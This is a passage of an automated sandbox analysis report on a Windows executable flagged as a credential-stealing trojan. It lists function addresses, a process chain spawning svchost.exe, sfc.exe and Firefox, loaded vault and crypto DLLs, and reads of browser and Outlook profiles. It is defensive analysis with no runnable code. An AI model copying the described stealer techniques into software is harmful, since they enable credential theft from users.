                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FAB401_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F6BD71_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA801_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037569621_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380A9A61_2_0380A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A01_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374A8401_2_0374A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037428401_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E8F01_2_0376E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037268B81_2_037268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B4F401_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03760F301_2_03760F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E2F301_2_037E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03782F281_2_03782F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374CFE01_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732FC81_2_03732FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BEFA01_2_037BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740E591_2_03740E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FEE261_2_037FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FEEDB1_2_037FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752E901_2_03752E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FCE931_2_037FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DCD1F1_2_037DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374AD001_2_0374AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373ADE01_2_0373ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03758DBF1_2_03758DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740C001_2_03740C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730CF21_2_03730CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0CB51_2_037E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372D34C1_2_0372D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F132D1_2_037F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0378739A1_2_0378739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E12ED1_2_037E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375B2C01_2_0375B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037452A01_2_037452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372F1721_2_0372F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377516C1_2_0377516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374B1B01_2_0374B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380B16B1_2_0380B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F70E91_2_037F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FF0E01_2_037FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EF0CC1_2_037EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037470C01_2_037470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FF7B01_2_037FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037856301_2_03785630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F16CC1_2_037F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F75711_2_037F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038095C31_2_038095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DD5B01_2_037DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037314601_2_03731460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FF43F1_2_037FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFB761_2_037FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B5BF01_2_037B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377DBF91_2_0377DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375FB801_2_0375FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B3A6C1_2_037B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFA491_2_037FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F7A461_2_037F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EDAC61_2_037EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DDAAC1_2_037DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03785AA01_2_03785AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E1AA31_2_037E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037499501_2_03749950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375B9501_2_0375B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D59101_2_037D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AD8001_2_037AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037438E01_2_037438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFF091_2_037FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03703FD21_2_03703FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03703FD51_2_03703FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFFB11_2_037FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03741F921_2_03741F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03749EB01_2_03749EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F7D731_2_037F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F1D5A1_2_037F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03743D401_2_03743D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375FDC01_2_0375FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B9C321_2_037B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFCF21_2_037FFCF2
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030DA3529_2_030DA352
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030E03E69_2_030E03E6
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0302E3F09_2_0302E3F0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030C02749_2_030C0274
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030A02C09_2_030A02C0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030101009_2_03010100
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030BA1189_2_030BA118
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030A81589_2_030A8158
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030E01AA9_2_030E01AA
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030D81CC9_2_030D81CC
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030B20009_2_030B2000
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030447509_2_03044750
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030207709_2_03020770
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0303C6E09_2_0303C6E0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030205359_2_03020535
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030E05919_2_030E0591
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030C44209_2_030C4420
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030D24469_2_030D2446
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030CE4F69_2_030CE4F6
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030DAB409_2_030DAB40
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030D6BD79_2_030D6BD7
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0301EA809_2_0301EA80
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030369629_2_03036962
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030229A09_2_030229A0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030EA9A69_2_030EA9A6
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030228409_2_03022840
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0302A8409_2_0302A840
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030068B89_2_030068B8
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0304E8F09_2_0304E8F0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03062F289_2_03062F28
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03040F309_2_03040F30
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030C2F309_2_030C2F30
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03094F409_2_03094F40
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0309EFA09_2_0309EFA0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03012FC89_2_03012FC8
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0302CFE09_2_0302CFE0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030DEE269_2_030DEE26
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03020E599_2_03020E59
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03032E909_2_03032E90
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030DCE939_2_030DCE93
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030DEEDB9_2_030DEEDB
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0302AD009_2_0302AD00
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030BCD1F9_2_030BCD1F
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03038DBF9_2_03038DBF
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0301ADE09_2_0301ADE0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03020C009_2_03020C00
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030C0CB59_2_030C0CB5
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03010CF29_2_03010CF2
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030D132D9_2_030D132D
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0300D34C9_2_0300D34C
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0306739A9_2_0306739A
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030252A09_2_030252A0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0303B2C09_2_0303B2C0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030C12ED9_2_030C12ED
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030EB16B9_2_030EB16B
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0305516C9_2_0305516C
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0300F1729_2_0300F172
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0302B1B09_2_0302B1B0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030CF0CC9_2_030CF0CC
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030270C09_2_030270C0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030D70E99_2_030D70E9
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030DF0E09_2_030DF0E0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030DF7B09_2_030DF7B0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030D16CC9_2_030D16CC
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030D75719_2_030D7571
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030BD5B09_2_030BD5B0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030DF43F9_2_030DF43F
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030114609_2_03011460
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030DFB769_2_030DFB76
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0303FB809_2_0303FB80
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03095BF09_2_03095BF0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0305DBF99_2_0305DBF9
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030DFA499_2_030DFA49
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030D7A469_2_030D7A46
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03093A6C9_2_03093A6C
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03065AA09_2_03065AA0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030BDAAC9_2_030BDAAC
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030C1AA39_2_030C1AA3
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030CDAC69_2_030CDAC6
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030B59109_2_030B5910
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030299509_2_03029950
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0303B9509_2_0303B950
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0308D8009_2_0308D800
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030238E09_2_030238E0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030DFF099_2_030DFF09
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03021F929_2_03021F92
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030DFFB19_2_030DFFB1
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03029EB09_2_03029EB0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03023D409_2_03023D40
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030D1D5A9_2_030D1D5A
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030D7D739_2_030D7D73
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_0303FDC09_2_0303FDC0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03099C329_2_03099C32
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030DFCF29_2_030DFCF2
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025C20709_2_025C2070
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025BB2509_2_025BB250
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025BB2449_2_025BB244
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025B13B19_2_025B13B1
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025BD1109_2_025BD110
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025BB1009_2_025BB100
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025C57509_2_025C5750
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025C39509_2_025C3950
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025C394B9_2_025C394B
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025BCEF09_2_025BCEF0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025BCEE99_2_025BCEE9
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025DBF309_2_025DBF30
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_02DCE2D39_2_02DCE2D3
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_02DCE1B79_2_02DCE1B7
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_02DCE6769_2_02DCE676
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_02DCE6719_2_02DCE671
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_02DCD7389_2_02DCD738
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_02DCE43C9_2_02DCE43C
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_02DCCA439_2_02DCCA43
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: String function: 007A8B40 appears 42 times
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: String function: 00787F41 appears 35 times
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: String function: 007A0D27 appears 70 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 03055130 appears 58 times
                Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 0309F290 appears 105 times
                Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 0308EA12 appears 86 times
                Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 03067E54 appears 102 times
                Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 0300B970 appears 278 times
                Source: yloe82Jp1k.exe, 00000000.00000003.1188953433.0000000003E63000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs yloe82Jp1k.exe
                Source: yloe82Jp1k.exe, 00000000.00000003.1189640647.000000000400D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs yloe82Jp1k.exe
                Source: yloe82Jp1k.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@16/9
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007EA2D5 GetLastError,FormatMessageW,0_2_007EA2D5
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007D8713 AdjustTokenPrivileges,CloseHandle,0_2_007D8713
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007D8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_007D8CC3
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007EB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_007EB59E
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007FF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_007FF121
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007EC602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_007EC602
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_00784FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00784FE9
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeFile created: C:\Users\user\AppData\Local\Temp\autE7A6.tmpJump to behavior
                Source: yloe82Jp1k.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: sfc.exe, 00000009.00000002.3633705117.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000009.00000003.1681584682.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000009.00000003.1681478958.0000000002A59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: yloe82Jp1k.exeVirustotal: Detection: 70%
                Source: yloe82Jp1k.exeReversingLabs: Detection: 81%
                Source: unknownProcess created: C:\Users\user\Desktop\yloe82Jp1k.exe "C:\Users\user\Desktop\yloe82Jp1k.exe"
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\yloe82Jp1k.exe"
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
                Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\yloe82Jp1k.exe"Jump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: yloe82Jp1k.exeStatic file information: File size 1173504 > 1048576
                Source: yloe82Jp1k.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: yloe82Jp1k.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: yloe82Jp1k.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: yloe82Jp1k.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: yloe82Jp1k.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: yloe82Jp1k.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: yloe82Jp1k.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
